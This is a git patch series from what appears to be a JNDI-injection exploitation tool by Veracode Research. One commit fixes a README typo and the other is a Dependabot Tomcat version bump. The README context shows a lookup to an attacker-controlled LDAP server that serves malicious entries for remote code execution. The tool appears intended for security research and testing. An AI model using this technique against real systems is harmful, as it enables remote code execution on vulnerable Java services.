From 8aa57e67988ff6de45d2415c440b06d3481dfb77 Mon Sep 17 00:00:00 2001 From: Michael Stepankin <44605151+artsploit@users.noreply.github.com> Date: Wed, 20 Nov 2019 15:00:14 +0000 Subject: [PATCH 1/2] small fix --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 95f09c6..18a03ee 100755 --- a/README.md +++ b/README.md @@ -7,7 +7,7 @@ In order to perform an attack, you can start these servers localy and then trigg ```java InitialContext.lookup("ldap://your_server.com:1389/o=reference"); ``` -It will initiate a connection from the vulnerable clinet to the local LDAP server. +It will initiate a connection from the vulnerable client to the local LDAP server. Then, the local server responds with a malicious entry containing one of the payloads, that can be useful to achieve a Remote Code Execution. ### Motivation @@ -81,4 +81,4 @@ This software is provided solely for educational purposes and/or for testing sys * An article about [Exploiting JNDI Injections in Java](https://www.veracode.com/blog/research/exploiting-jndi-injections-java) in the Veracode Blog ### Authors -[Michael Stepankin](https://twitter.com/artsploit), Veracode Research \ No newline at end of file +[Michael Stepankin](https://twitter.com/artsploit), Veracode Research From 667e9ced7ada1bd685a7bc679620526d5239fc84 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Fri, 28 Feb 2020 01:28:50 +0000 Subject: [PATCH 2/2] Bump tomcat-embed-core from 8.5.45 to 8.5.51 Bumps tomcat-embed-core from 8.5.45 to 8.5.51. Signed-off-by: dependabot[bot] --- pom.xml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) mode change 100755 => 100644 pom.xml diff --git a/pom.xml b/pom.xml old mode 100755 new mode 100644 index aca5bb5..72e15dd --- a/pom.xml +++ b/pom.xml @@ -17,7 +17,7 @@ org.apache.tomcat.embed tomcat-embed-core - 8.5.45 + 8.5.51